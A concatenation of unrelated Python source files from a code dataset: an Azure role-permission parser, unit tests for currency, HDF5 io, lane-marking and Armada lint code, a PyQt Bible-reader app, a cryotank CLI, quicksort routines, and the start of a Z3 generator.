})
matched = True
if not action.lower().startswith("microsoft."):
has_external = True
if not matched:
has_unknown = True
for permission in raw_role['permissions']:
for action in permission['notActions']:
matched = False
matchexpression = "^" + action.replace(".", "\\.").replace("*", ".*").replace("?", ".{{1}}") + "$"
for provider in provider_ops:
for operation in provider['operations']:
if not operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_actions = list(filter(lambda x: x['name'].lower() != operation['name'].lower(), permitted_actions))
matched = True
for resource_type in provider['resourceTypes']:
for operation in resource_type['operations']:
if not operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_actions = list(filter(lambda x: x['name'].lower() != operation['name'].lower(), permitted_actions))
matched = True
if not action.lower().startswith("microsoft."):
has_external = True
if not matched:
has_unknown = True
for permission in raw_role['permissions']:
for action in permission['notDataActions']:
matched = False
matchexpression = "^" + action.replace(".", "\\.").replace("*", ".*").replace("?", ".{{1}}") + "$"
for provider in provider_ops:
for operation in provider['operations']:
if operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_data_actions = list(filter(lambda x: x['name'].lower() != operation['name'].lower(), permitted_data_actions))
matched = True
for resource_type in provider['resourceTypes']:
for operation in resource_type['operations']:
if operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_data_actions = list(filter(lambda x: x['name'].lower() != operation['name'].lower(), permitted_data_actions))
matched = True
if not action.lower().startswith("microsoft."):
has_external = True
if not matched:
has_unknown = True
result['roles'].append({
'name': raw_role['roleName'],
'description': raw_role['description'],
'permittedActions': permitted_actions,
'permittedDataActions': permitted_data_actions,
'rawPermissions': raw_role['permissions'],
'hasUnknown': has_unknown,
'hasExternal': has_external
})
with open("azure/built-in-roles.json", "w") as f:
f.write(json.dumps(result, indent=2, sort_keys=True))
| 7,028 | 1,590 |
# coding: utf-8
import datetime
import random
from unittest.mock import Mock
from django.db import reset_queries
import pytest
from src.domain.exchange_rate import CurrencyEntity, CurrencyExchangeRateEntity
from src.usecases.exchange_rate import CurrencyInteractor, CurrencyExchangeRateInteractor
from tests.fixtures import currency, exchange_rate
@pytest.mark.unit
def test_currency_interactor_get(currency):
currency_repo = Mock()
currency_repo.get.return_value = currency
currency_interactor = CurrencyInteractor(currency_repo)
result = currency_interactor.get(currency.code)
assert currency_repo.get.called
assert result.code == currency.code
assert result.name == currency.name
assert result.symbol == currency.symbol
assert CurrencyEntity.to_string(result) == CurrencyEntity.to_string(currency)
@pytest.mark.unit
def test_currency_interactor_get_availables(currency):
num_of_currencies = random.randint(1, 10)
currencies_available = [currency for _ in range(num_of_currencies)]
currency_repo = Mock()
currency_repo.get_availables.return_value = currencies_available
currency_interactor = CurrencyInteractor(currency_repo)
result = currency_interactor.get_availables()
assert currency_repo.get_availables.called
assert isinstance(result, list)
assert len(result) == num_of_currencies
assert all([isinstance(currency, CurrencyEntity) for currency in result])
@pytest.mark.unit
def test_currency_interactor_save(currency):
currency_repo = Mock()
currency_repo.save.return_value = None
currency_interactor = CurrencyInteractor(currency_repo)
result = currency_interactor.save(currency)
assert currency_repo.save.called
assert result is None
@pytest.mark.unit
def test_currency_interactor_bulk_save(currency):
currencies = [currency for _ in range(random.randint(1, 10))]
currency_repo = Mock()
currency_repo.bulk_save.return_value = None
currency_interactor = CurrencyInteractor(currency_repo)
result = currency_interactor.bulk_save(currencies)
assert currency_repo.bulk_save.called
assert result is None
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get(exchange_rate):
exchange_rate_repo = Mock()
exchange_rate_repo.get.return_value = exchange_rate
exchange_rate_interactor = CurrencyExchangeRateInteractor(exchange_rate_repo)
filter = {
'source_currency': exchange_rate.source_currency,
'exchanged_currency': exchange_rate.exchanged_currency,
'valuation_date': exchange_rate.valuation_date
}
result = exchange_rate_interactor.get(**filter)
assert exchange_rate_repo.get.called
assert result.source_currency == exchange_rate.source_currency
assert result.exchanged_currency == exchange_rate.exchanged_currency
assert result.valuation_date == exchange_rate.valuation_date
assert result.rate_value == exchange_rate.rate_value
assert CurrencyExchangeRateEntity.to_string(
result) == CurrencyExchangeRateEntity.to_string(exchange_rate)
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get_latest(exchange_rate):
exchange_rate_repo = Mock()
exchange_rate_repo.get.return_value = exchange_rate
exchange_rate_interactor = CurrencyExchangeRateInteractor(exchange_rate_repo)
filter = {
'source_currency': exchange_rate.source_currency,
'exchanged_currency': exchange_rate.exchanged_currency
}
result = exchange_rate_interactor.get_latest(**filter)
assert exchange_rate_repo.get.called
assert result.source_currency == exchange_rate.source_currency
assert result.exchanged_currency == exchange_rate.exchanged_currency
assert result.valuation_date == datetime.date.today().strftime('%Y-%m-%d')
assert result.rate_value == exchange_rate.rate_value
assert CurrencyExchangeRateEntity.to_string(
result) == CurrencyExchangeRateEntity.to_string(exchange_rate)
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get_rate_series(exchange_rate):
num_of_rates = random.randint(1, 10)
rate_series = [round(random.uniform(0.8, 1.2), 6) for _ in range(num_of_rates)]
exchange_rate_repo = Mock()
exchange_rate_repo.get_rate_series.return_value = rate_series
exchange_rate_interactor = CurrencyExchangeRateInteractor(exchange_rate_repo)
filter = {
'source_currency': exchange_rate.source_currency,
'exchanged_currency': exchange_rate.exchanged_currency,
'date_from': datetime.date.today() + datetime.timedelta(days=-num_of_rates),
'date_to': datetime.date.today()
}
result = exchange_rate_interactor.get_rate_series(**filter)
assert exchange_rate_repo.get_rate_series.called
assert isinstance(result, list)
assert len(result) == num_of_rates
assert all([isinstance(rate, float) for rate in result])
@pytest.mark.unit
def test_currency_exchange_rate_interactor_get_time_series(exchange_rate):
series_length = random.randint(1, 10)
time_series = [exchange_rate for _ in range(series_length)]
exchange_rate_repo = Mock()
exchange_rate_repo.get_time_series.return_value = time_series
exchange_rate_interactor = CurrencyExchangeRateInteractor(exchange_rate_repo)
filter = {
'source_currency': exchange_rate.source_currency,
'exchanged_currency': exchange_rate.exchanged_currency,
'date_from': datetime.date.today() + datetime.timedelta(days=-series_length),
'date_to': datetime.date.today()
}
result = exchange_rate_interactor.get_time_series(**filter)
assert exchange_rate_repo.get_time_series.called
assert isinstance(result, list)
assert len(result) == series_length
assert all([isinstance(cer, CurrencyExchangeRateEntity) for cer in result])
@pytest.mark.unit
def test_currency_exchange_rate_interactor_save(exchange_rate):
exchange_rate_repo = Mock()
exchange_rate_repo.save.return_value = None
exchange_rate_interactor = CurrencyExchangeRateInteractor(exchange_rate_repo)
result = exchange_rate_interactor.save(exchange_rate)
assert exchange_rate_repo.save.called
assert result is None
@pytest.mark.unit
def test_currency_exchange_rate_interactor_bulk_save(exchange_rate):
exchange_rates = [exchange_rate for _ in range(random.randint(1, 10))]
exchange_rate_repo = Mock()
exchange_rate_repo.bulk_save.return_value = None
exchange_rate_interactor = CurrencyExchangeRateInteractor(exchange_rate_repo)
result = exchange_rate_interactor.bulk_save(exchange_rates)
assert exchange_rate_repo.bulk_save.called
assert result is None
| 6,656 | 2,006 |
""" This module tests the io subpackage implementation.
Author: Nils Geib, nils.geib@uni-jena.de
"""
import numpy as np
from pypret import io
from pprint import pformat
from os import remove
class IO1(io.IO):
x = 1
def squared(self):
return self.x * self.x
def __repr__(self):
return "IO1(x={0})".format(self.x)
class Grid(io.IO):
_io_store = ['N', 'dx', 'x0']
def __init__(self, N, dx, x0=0.0):
# This is _not_ called upon loading from storage
self.N = N
self.dx = dx
self.x0 = x0
self._post_init()
def _post_init(self):
# this is called upon loading from storage
# calculate the grids
n = np.arange(self.N)
self.x = self.x0 + n * self.dx
def __repr__(self):
return "TestIO1(N={0}, dx={1}, x0={2})".format(
self.N, self.dx, self.x0)
def test_io():
# test flat arrays
_assert_io(np.arange(5))
_assert_io(np.arange(5, dtype=np.complex128))
# test nested structures of various types
_assert_io([{'a': 1.0, 'b': np.uint16(1)}, np.random.rand(10),
True, None, "hello", 1231241512354134123412353124, b"bytes"])
_assert_io([[[1]], [[[[1], 2], 3], 4], 5])
# Test custom objects
_assert_io(IO1())
_assert_io(Grid(128, 0.23, x0=-2.3))
def _assert_io(x):
""" This is slightly hacky: we use pprint to recursively print the objects
and compare the resulting strings to make sure they are the same. This
only works as pprint sorts the dictionary entries by their keys before
printing.
This requires custom objects to implement __repr__.
"""
io.save(x, "test.hdf5")
x2 = io.load("test.hdf5")
remove("test.hdf5")
s1 = pformat(x)
s2 = pformat(x2)
if s1 != s2:
print(s1)
print(s2)
assert False
if __name__ == "__main__":
test_io()
| 1,978 | 778 |
from utils import *
from shared import *
from updating import MyAppContext
from threading import Thread
import re
import sys
import os
class BooksPage(Page, FilterableList):
'''Lists books from Gen->Rev and connects to next chapters page.
First page of application.'''
def __init__(self):
Page.__init__(self)
FilterableList.__init__(self)
self.set_items(BOOK_NAMES)
# self.set_items([c for c in 'abcdefghijklmnopqrstuvwxyz']) # for testing
self.itemActivated.connect(self.on_book_selected)
def on_book_selected(self, book_item):
# book_item is QtListItem
book = book_item.text()
# show content
if has_chapters(book):
# go to chapter screen
self.nav.to(ChaptersPage, state=get_num_chapters(book))
else:
# skip to verses screen
self.nav.to(VersesPage, state=data.bible[book]) # or get_bible_content(data.curr_scripture.inc(bok))
# widget cleanup
self.nav.set_title(data.curr_scripture.inc(book, inplace=True))
self.searchbox.deactivate()
self.show_all() # reset any searches when naving back
def keyPressEvent(self, event):
if event.key() == Qt.Key_Escape:
QApplication.exit(2)#RESTART_EXIT_CODE)
if ctrl_f_event(event):
self.nav.to(SearchResultsPage, state=lambda: iter_verses_in_whole_bible())
self.searchbox.deactivate()
else:
FilterableList.keyPressEvent(self, event) # this is 0th page; don't need nav back
class ChaptersPage(Page, FilterableList):
'''List of chapter numbers 1->n for given book and connects to next verses page.'''
def __init__(self):
Page.__init__(self)
FilterableList.__init__(self)
self.itemActivated.connect(self.on_chapter_selected)
def load_state(self, state):
num_chapters = state
self.set_items(range(1, num_chapters+1))
def on_chapter_selected(self, chapter_item):
chapter = chapter_item.text()
data.curr_scripture.inc(chapter, inplace=True)
# show the content
verses = get_bible_content(data.curr_scripture)
self.nav.to(VersesPage, state=verses)
# widget cleanup
self.nav.set_title(str(data.curr_scripture))
self.searchbox.deactivate()
self.show_all() # reset any searches when naving back
def keyPressEvent(self, event):
if not self.search_is_active() and event.key() == Qt.Key_Backspace:
self.nav.back()
self.nav.set_title(data.curr_scripture.dec(inplace=True))
elif ctrl_f_event(event):
# book_scripture = data.curr_scripture
self.nav.to(SearchResultsPage, state=lambda: iter_verses_in_book(data.curr_scripture))
self.searchbox.deactivate()
else:
FilterableList.keyPressEvent(self, event)
class VersesPage(Page, QTextEdit, Filterable):
'''Formats dict of verses {num: text} into text display.
Filterable by verse num, isolating and highlighting text.'''
def __init__(self):
Page.__init__(self)
QTextEdit.__init__(self)
Filterable.__init__(self)
# style
self.setReadOnly(True)
set_font_size(self, 11)
def load_state(self, state):
# state = dict of verses in chapter
self.verses = state
self.show_all()
def show_all(self):
# render
html = format_to_html(self.verses)
self.set_html(html)
def set_html(self, html):
# wrapping textEdit.setHtml to keep scroll position
scroll_pos = self.verticalScrollBar().value()
self.setHtml(html) # this resets scroll
self.verticalScrollBar().setValue(scroll_pos)
def filter_items(self, pattern):
# highlight verse, given number
# make sure the verse is there
if pattern not in self.verses.keys():
self.show_all()
return
n = int(pattern)
verse = self.verses[str(n)]
# divide text around verse
pre_verses = dict_where_keys(self.verses, lambda k: int(k) < n)
main_verse = {n: verse}
post_verses = dict_where_keys(self.verses, lambda k: int(k) > n)
pre, main, post = (format_to_html(vs) for vs in (pre_verses, main_verse, post_verses))
html = (
OPACITY_TEMPLATE.format(pre) +
f' {main} ' +
OPACITY_TEMPLATE.format(post)
)
self.set_html(html)
# find verse position in text widget
plain_verse = to_plaintext(main)
plain_start = self.toPlainText().index(plain_verse)
c = self.textCursor()
c.setPosition(plain_start)
self.setTextCursor(c)
# scroll to verse position
rect = self.cursorRect()
top = rect.top()
vbar = self.verticalScrollBar()
vbar.setValue(vbar.value() + top) # top of verse is top of screen
if not vbar.value() == vbar.maximum(): # avoid edge case of last verse: it stays maximum scroll, else hiding last line
vbar.triggerAction(QAbstractSlider.SliderSingleStepSub) # but in general content looks nicer when not pinned to top
def change_highlighted_scripture(self, diff):
pattern = self.searchbox.text()
# allow new highlight from beginning or end
if pattern == '':
last_verse = list(self.verses.keys())[-1]
n = (1 if diff == 1 else last_verse)
# else make sure a verse is already selected
elif pattern not in self.verses.keys():
return
# make sure new verse within bounds
else:
n = int(pattern) + diff
if str(n) not in self.verses.keys():
return
# update searchbox, which triggers new highlight filter and updates user
self.searchbox.activate(str(n))
def keyPressEvent(self, event):
keypress = event.key()
# nav back when backspacing without searchbox
if not self.search_is_active() and keypress == Qt.Key_Backspace:
self.nav.back()
self.nav.set_title(data.curr_scripture.dec(inplace=True))
self.verticalScrollBar().setValue(0) # scroll back to top
elif event.modifiers() == Qt.ControlModifier:
# scripture up/down
if keypress in (Qt.Key_Down, Qt.Key_Up):
diff = (1 if keypress == Qt.Key_Down else -1)
self.change_highlighted_scripture(diff)
# search this chapter
elif keypress == Qt.Key_F:
self.nav.to(SearchResultsPage, state=lambda: scriptures_with_verses(data.curr_scripture, self.verses))
self.searchbox.deactivate()
self.verticalScrollBar().setValue(0) # scroll back to top
# scroll
elif keypress in (Qt.Key_Down, Qt.Key_Up):
QTextEdit.keyPressEvent(self, event)
# keypress goes to searchbox
else:
Filterable.keyPressEvent(self, event)
class SearchResultDelegate(QStyledItemDelegate):
# custom list item rendering,
# mainly just to format a title and subtitle while looking like default list widget item
def paint(self, painter, option, index):
# turns item text into title and subtitle.
# imitates standard list widget item style on select.
# title bolded, subtitle beneath.
# maybe custom eliding for ellipsis on both left and right, focused around match?
# or at least on right, with match surely in view starting from left
painter.save()
item = index.data(Qt.DisplayRole) # default item data is at role 0
# custom data was passed into this item, no longer usual type str
title = str(item['scripture']) + '\n'
subtitle = '\n' + item['text']
given_rect = option.rect # from size hint
states = option.state # bitwise OR of QStyle.State_ flags
if states & QStyle.State_Selected:
palette = QApplication.palette()
painter.setPen(palette.color(QPalette.HighlightedText))
painter.fillRect(given_rect, palette.color(QPalette.Highlight))
# text inset by small margin
text_rect = given_rect.adjusted(2, 2, -2, -2)
# draw title text
em_font = QFont(option.font) # copy
em_font.setWeight(QFont.Bold)
painter.setFont(em_font)
painter.drawText(text_rect, option.displayAlignment, title)
# draw subtitle text
painter.setFont(option.font) # back to default font
# painter.translate(3, 0) # slight indent under title might look nice
elided_subtitle = QFontMetrics(QFont(option.font)).elidedText(subtitle, Qt.ElideRight, text_rect.width())#, Qt.TextShowMnemonic)
# elided_subtitle = painter.fontMetrics().elidedText(subtitle, Qt.ElideRight, text_rect.width())#, Qt.TextShowMnemonic)
painter.drawText(text_rect, option.displayAlignment, elided_subtitle)
painter.restore()
def sizeHint(self, option, index):
# fit to width, creating ellipsis on long text with no need for horiz scroll
# default height seems to have been n*line_height of str in option.data(Qt.DisplayRole)
s = QSize()
font_metrics = QFontMetrics(option.font)
line_height = font_metrics.height()
extra = 4 # produces more comfortable line spacing; 'elbow room'
s.setHeight(2*line_height + extra) # 1 line for title, subtitle each
s.setWidth(0) # don't allow horiz scroll when there's wide items
return s
class SearchResultsPage(Page, FilterableList):
'''Searches given verses by regex from searchbox and shows matches in list.'''
def __init__(self):
self.default_placeholder_msg = 'search regex:'
Page.__init__(self)
FilterableList.__init__(self, placeholder=self.default_placeholder_msg)
self.setItemDelegate(SearchResultDelegate(self)) # custom rendering of list item
# self.itemActivated.connect(self.on_result_item_selected)
# dummy searchbox serves as visual prompt on empty screen
# gives better communication to user
self.fake_searchbox = SearchBox(None)
add_grid_child(self, self.fake_searchbox, Qt.AlignRight | Qt.AlignBottom, grid=self.layout())
self.fake_searchbox.show()
# to decrease stalling when doing a large search?
# self._thread = None
# batches aren't working/helping, maybe because it's a listwidget instead of listview
# QListView.setLayoutMode(self, QListView.Batched)
# self.setBatchSize(5)
# self.setUniformItemSizes(True) # don't think it's helping
# maybe implement a list view instead of a list widget?
def load_state(self, state):
# state = callable that produces iter of verses in desired scope
self.verses_iter_factory = state
scope = str(data.curr_scripture)
self.nav.set_title('Search ' + scope)
self.show_all() # trigger empty search display
def show_all(self):
# called when searchbox is empty, which means
# show placeholder and extra searchbox prompt for user.
self.clear()
self.fake_searchbox.show()
self.placeholder.setText(self.default_placeholder_msg)
def show_items(self, items):
# replaced by custom filter_items, so override and do nothing
return
# def on_result_item_selected(self, item):
# # callback for list widget selection
# d = item.data(Qt.DisplayRole)
# self.nav.to(SearchedVersePage, state=d['location'])
def filter_items(self, search_text):
# show matches of search in a list
self.fake_searchbox.hide() # could be showing if this is first char of search
self.placeholder.setText(self.default_placeholder_msg) # could be diff if last search was error
try:
re.compile(search_text)
except re.error:
self.placeholder.setText('invalid regex')
self.clear()
return
self.clear()
# items = []
for scripture, verse_text in self.verses_iter_factory():
match = re.search(search_text, verse_text)
if match is not None:
item = QListWidgetItem()#self)
item.setData(Qt.DisplayRole, {
'scripture': scripture,
'text': verse_text.replace('\n', ' '),
})
# items.append(item)
self.addItem(item)
# for i in items:
# self.addItem(i)
# print(self.item(100).data(0))
# when finished iter and no matches
if self.is_empty():
self.placeholder.setText('no results')
else:
self.placeholder.setText('')
def is_empty(self):
# return QListWidget.count(self) == 0 # works if you used addItem
return self.itemAt(0, 0) is None # works with just making ListItem(self), not having called addItem
def keyPressEvent(self, event):
empty_search = not self.search_is_active() or self.searchbox.text() == ''
if empty_search and event.key() == Qt.Key_Backspace:
self.nav.back()
self.nav.set_title(str(data.curr_scripture))
# self.clear()
else:
FilterableList.keyPressEvent(self, event)
class Main(QWidget):
# outer window shown; wraps child and restores settings from last session
def __init__(self, child):
super().__init__()
layout = MarginGrid()
layout.addWidget(child, 0, 0)
self.setLayout(layout)
child.setParent(self)
self.settings = QSettings(str(RESOURCE_DIR / 'settings.ini'), QSettings.IniFormat) # I can specify the location
# self.settings = QSettings('FastBible', 'FastBible') # saved in some OS specific location
default = bytes('', encoding='utf-8')
geometry = self.settings.value('geometry', default)
self.restoreGeometry(geometry)
def closeEvent(self, event):
geometry = self.saveGeometry()
self.settings.setValue('geometry', geometry)
super().closeEvent(event)
# --- run
if __name__ == '__main__':
appctxt = MyAppContext()
set_theme(appctxt.app)
init_data()
main = Main(PageManager(BooksPage, ChaptersPage, VersesPage, SearchResultsPage))
main.show()
main.setWindowTitle('Bible')
# exit_code = appctxt.app.exec_()
# sys.exit(exit_code)
appctxt.app.run()
| 14,682 | 4,325 |
# Copyright 2017 The Armada Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import yaml
import os
from armada.utils import lint
class LintTestCase(unittest.TestCase):
def setUp(self):
self.basepath = os.path.join(os.path.dirname(__file__))
def test_lint_armada_yaml_pass(self):
template = '{}/templates/valid_armada_document.yaml'.format(
self.basepath)
document = yaml.safe_load_all(open(template).read())
resp = lint.validate_armada_documents(document)
self.assertTrue(resp)
def test_lint_armada_manifest_no_groups(self):
template_manifest = """
schema: armada/Manifest/v1
metadata:
schema: metadata/Document/v1
name: example-manifest
data:
release_prefix: example
"""
document = yaml.safe_load_all(template_manifest)
with self.assertRaises(Exception):
lint.validate_armada_documents(document)
def test_lint_validate_manifest_pass(self):
template_manifest = """
schema: armada/Manifest/v1
metadata:
schema: metadata/Document/v1
name: example-manifest
data:
release_prefix: example
chart_groups:
- example-group
"""
document = yaml.safe_load_all(template_manifest)
self.assertTrue(lint.validate_manifest_document(document))
def test_lint_validate_manifest_no_prefix(self):
template_manifest = """
schema: armada/Manifest/v1
metadata:
schema: metadata/Document/v1
name: example-manifest
data:
chart_groups:
- example-group
"""
document = yaml.safe_load_all(template_manifest)
with self.assertRaises(Exception):
lint.validate_manifest_document(document)
def test_lint_validate_group_pass(self):
template_manifest = """
schema: armada/ChartGroup/v1
metadata:
schema: metadata/Document/v1
name: example-manifest
data:
description: this is sample
chart_group:
- example-group
"""
document = yaml.safe_load_all(template_manifest)
self.assertTrue(lint.validate_chart_group_document(document))
def test_lint_validate_group_no_chart_group(self):
template_manifest = """
schema: armada/ChartGroup/v1
metadata:
schema: metadata/Document/v1
name: example-manifest
data:
description: this is sample
"""
document = yaml.safe_load_all(template_manifest)
with self.assertRaises(Exception):
lint.validate_chart_group_document(document)
def test_lint_validate_chart_pass(self):
template_manifest = """
schema: armada/Chart/v1
metadata:
schema: metadata/Document/v1
name: example-chart
data:
name: keystone
release: keystone
namespace: undercloud
timeout: 100
install:
no_hooks: false
upgrade:
no_hooks: false
values: {}
source:
type: git
location: git://github.com/example/example
subpath: example-chart
reference: master
dependencies:
- dep-chart
"""
document = yaml.safe_load_all(template_manifest)
self.assertTrue(lint.validate_chart_document(document))
def test_lint_validate_chart_no_release(self):
template_manifest = """
schema: armada/Chart/v1
metadata:
schema: metadata/Document/v1
name: example-chart
data:
name: keystone
namespace: undercloud
timeout: 100
install:
no_hooks: false
upgrade:
no_hooks: false
values: {}
source:
type: git
location: git://github.com/example/example
subpath: example-chart
reference: master
dependencies:
- dep-chart
"""
document = yaml.safe_load_all(template_manifest)
with self.assertRaises(Exception):
lint.validate_chart_document(document)
def test_lint_validate_manifest_url(self):
value = 'url'
assert lint.validate_manifest_url(value) is False
value = 'https://raw.githubusercontent.com/att-comdev/' \
'armada/master/examples/simple.yaml'
assert lint.validate_manifest_url(value) is True
def test_lint_validate_manifest_filepath(self):
value = 'filepath'
assert lint.validate_manifest_filepath(value) is False
value = '{}/templates/valid_armada_document.yaml'.format(
self.basepath)
assert lint.validate_manifest_filepath(value) is True
| 5,458 | 1,489 |
#! /usr/bin/env python
import csv
import sys
import os
import pathogenseq.files as psf
infile = sys.argv[1]
for row in csv.DictReader(open(infile)):
f1 = "%s.fastq.gz" % row["Barcode"]
f2 = "%s.%s.fastq.gz" % (row["Name"],row["Barcode"])
psf.filecheck(f1)
os.rename(f1,f2)
| 278 | 126 |
import sys
import json
import pprint
import argparse
import logging
import synapse.common as s_common
import synapse.cryotank as s_cryotank
import synapse.lib.cell as s_cell
import synapse.lib.output as s_output
import synapse.lib.msgpack as s_msgpack
logger = logging.getLogger(__name__)
def _except_wrap(it, error_str_func):
''' Wrap an iterator and adds a bit of context to the exception message '''
item_no = 0
while True:
item_no += 1
try:
yield next(it)
except StopIteration:
return
except Exception as e:
extra_context = error_str_func(item_no)
e.args = (extra_context + ': ' + str(e.args[0]), ) + e.args[1:]
raise
def main(argv, outp=s_output.stdout):
pars = argparse.ArgumentParser(prog='cryo.cat', description='display data items from a cryo cell')
pars.add_argument('cryocell', help='The cell descriptor and cryo tank path (cell://<host:port>/<name>).')
pars.add_argument('--list', default=False, action='store_true', help='List tanks in the remote cell and return')
pars.add_argument('--offset', default=0, type=int, help='Begin at offset index')
pars.add_argument('--size', default=10, type=int, help='How many items to display')
pars.add_argument('--timeout', default=10, type=int, help='The network timeout setting')
pars.add_argument('--authfile', help='Path to your auth file for the remote cell')
group = pars.add_mutually_exclusive_group()
group.add_argument('--jsonl', action='store_true', help='Input/Output items in jsonl format')
group.add_argument('--msgpack', action='store_true', help='Input/Output items in msgpack format')
pars.add_argument('--verbose', '-v', default=False, action='store_true', help='Verbose output')
pars.add_argument('--ingest', '-i', default=False, action='store_true',
help='Reverses direction: feeds cryotank from stdin in msgpack or jsonl format')
pars.add_argument('--omit-offset', default=False, action='store_true',
help="Don't output offsets of objects. This is recommended to be used when jsonl/msgpack"
" output is used.")
opts = pars.parse_args(argv)
if opts.verbose:
logger.setLevel(logging.INFO)
if not opts.authfile:
logger.error('Currently requires --authfile until neuron protocol is supported')
return 1
if opts.ingest and not opts.jsonl and not opts.msgpack:
logger.error('Must specify exactly one of --jsonl or --msgpack if --ingest is specified')
return 1
authpath = s_common.genpath(opts.authfile)
auth = s_msgpack.loadfile(authpath)
netw, path = opts.cryocell[7:].split('/', 1)
host, portstr = netw.split(':')
addr = (host, int(portstr))
logger.info('connecting to: %r', addr)
cuser = s_cell.CellUser(auth)
with cuser.open(addr, timeout=opts.timeout) as sess:
cryo = s_cryotank.CryoClient(sess)
if opts.list:
for name, info in cryo.list(timeout=opts.timeout):
outp.printf('%s: %r' % (name, info))
return 0
if opts.ingest:
if opts.msgpack:
fd = sys.stdin.buffer
item_it = _except_wrap(s_msgpack.iterfd(fd), lambda x: 'Error parsing item %d' % x)
else:
fd = sys.stdin
item_it = _except_wrap((json.loads(s) for s in fd), lambda x: ('Failure parsing line %d of input' % x))
cryo.puts(path, item_it)
else:
for item in cryo.slice(path, opts.offset, opts.size, opts.timeout):
i = item[1] if opts.omit_offset else item
if opts.jsonl:
outp.printf(json.dumps(i, sort_keys=True))
elif opts.msgpack:
sys.stdout.write(s_msgpack.en(i))
else:
outp.printf(pprint.pformat(i))
return 0
if __name__ == '__main__': # pragma: no cover
logging.basicConfig()
sys.exit(main(sys.argv[1:]))
| 4,100 | 1,303 |
"""Test cases for lane.py."""
import os
import unittest
import numpy as np
from ..common.utils import list_files
from .lane import (
eval_lane_per_threshold,
evaluate_lane_marking,
get_foreground,
get_lane_class,
sub_task_funcs,
)
class TestGetLaneClass(unittest.TestCase):
"""Test cases for the lane specific channel extraction."""
def test_partialled_classes(self) -> None:
"""Check the function that partial get_lane_class."""
for num in range(255):
byte = np.array(num, dtype=np.uint8)
if num & 8:
self.assertTrue(get_lane_class(byte, 1, 3, 1))
else:
self.assertTrue(get_lane_class(byte, 0, 3, 1))
self.assertTrue(get_foreground(byte))
if num & (1 << 5):
self.assertTrue(sub_task_funcs["direction"](byte, 1))
else:
self.assertTrue(sub_task_funcs["direction"](byte, 0))
if num & (1 << 4):
self.assertTrue(sub_task_funcs["style"](byte, 1))
else:
self.assertTrue(sub_task_funcs["style"](byte, 0))
class TestEvalLanePerThreshold(unittest.TestCase):
"""Test cases for the per image per threshold lane marking evaluation."""
def test_two_parallel_lines(self) -> None:
"""Check the correctness of the function in general cases."""
a = np.zeros((10, 10), dtype=bool)
b = np.zeros((10, 10), dtype=bool)
a[3, 3:7] = True
b[7, 3:7] = True
for radius in [1, 2, 3]:
self.assertAlmostEqual(eval_lane_per_threshold(a, b, radius), 0.0)
for radius in [4, 5, 6]:
self.assertAlmostEqual(eval_lane_per_threshold(a, b, radius), 1.0)
def test_two_vertical_lines(self) -> None:
"""Check the correctness of the function in general cases."""
a = np.zeros((10, 10), dtype=bool)
b = np.zeros((10, 10), dtype=bool)
a[3, 3:6] = True
b[5:8, 7] = True
self.assertAlmostEqual(eval_lane_per_threshold(a, b, 2), 0.0)
self.assertAlmostEqual(eval_lane_per_threshold(a, b, 3), 1 / 3)
self.assertAlmostEqual(eval_lane_per_threshold(a, b, 4), 2 / 3)
self.assertAlmostEqual(eval_lane_per_threshold(a, b, 5), 1.0)
class TestEvaluateLaneMarking(unittest.TestCase):
"""Test cases for the evaluate_lane_marking function."""
def test_mock_cases(self) -> None:
"""Check the peformance of the mock case."""
cur_dir = os.path.dirname(os.path.abspath(__file__))
gt_dir = "{}/testcases/lane/gts".format(cur_dir)
res_dir = "{}/testcases/lane/res".format(cur_dir)
result = evaluate_lane_marking(
list_files(gt_dir, ".png", with_prefix=True),
list_files(res_dir, ".png", with_prefix=True),
nproc=1,
)
data_frame = result.pd_frame()
data_arr = data_frame.to_numpy()
gt_data_arr = np.array(
[
[70.53328267, 80.9831119, 100.0],
[100.0, 100.0, 100.0],
[70.53328267, 80.9831119, 100.0],
[100.0, 100.0, 100.0],
[99.82147748, 100.0, 100.0],
[100.0, 100.0, 100.0],
[100.0, 100.0, 100.0],
[75.33066961, 79.34917317, 100.0],
[71.02916505, 86.25984707, 100.0],
[100.0, 100.0, 100.0],
[96.43828133, 100.0, 100.0],
[94.79621737, 100.0, 100.0],
[85.26664133, 90.49155595, 100.0],
[85.26664133, 90.49155595, 100.0],
[92.17697636, 95.70112753, 100.0],
[87.57008634, 92.22807981, 100.0],
]
)
data_arr = data_frame.to_numpy()
self.assertTrue(np.isclose(data_arr, gt_data_arr).all())
if __name__ == "__main__":
unittest.main()
| 3,905 | 1,591 |
import random
def partition(array, low, high):
pivot = array[(low + high) // 2]
left = low - 1
right = high + 1
while(True):
left += 1
while array[left] < pivot:
left += 1
right -= 1
while array[right] > pivot:
right -= 1
if left >= right:
return right
array[left], array[right] = array[right], array[left]
def quicksort(array, low, high):
if low < high:
pivot = partition(array, low, high)
quicksort(array=array, low=low, high=pivot)
quicksort(array=array, low=pivot+1, high=high)
return
def randomized_partition(array, low, high):
pivot = array[random.randint(low, high)]
left = low - 1
right = high + 1
while(True):
left += 1
while array[left] < pivot:
left += 1
right -= 1
while array[right] > pivot:
right -= 1
if left >= right:
return right
array[left], array[right] = array[right], array[left]
def randomized_quicksort(array, low, high):
if low < high:
pivot = randomized_partition(array, low, high)
quicksort(array=array, low=low, high=pivot)
quicksort(array=array, low=pivot+1, high=high)
return
def qsort(array, mode='normal'):
if mode == 'normal':
quicksort(array, 0, len(array) -1)
elif mode == 'randomized':
randomized_quicksort(array, 0, len(array) -1)
return array
| 1,561 | 494 |
import logging
from stencil_ir import *
from verify import *
from assertion_to_z3 import *
import generate_sketch
import asp.codegen.ast_tools as ast_tools
def loop_key(node):
import hashlib
return hashlib.sha224(tree_to_str(node)).hexdigest()[0:10]
class Z3Generator(object):
"""
Generates a Z3 script, with the parsed postcondition from the
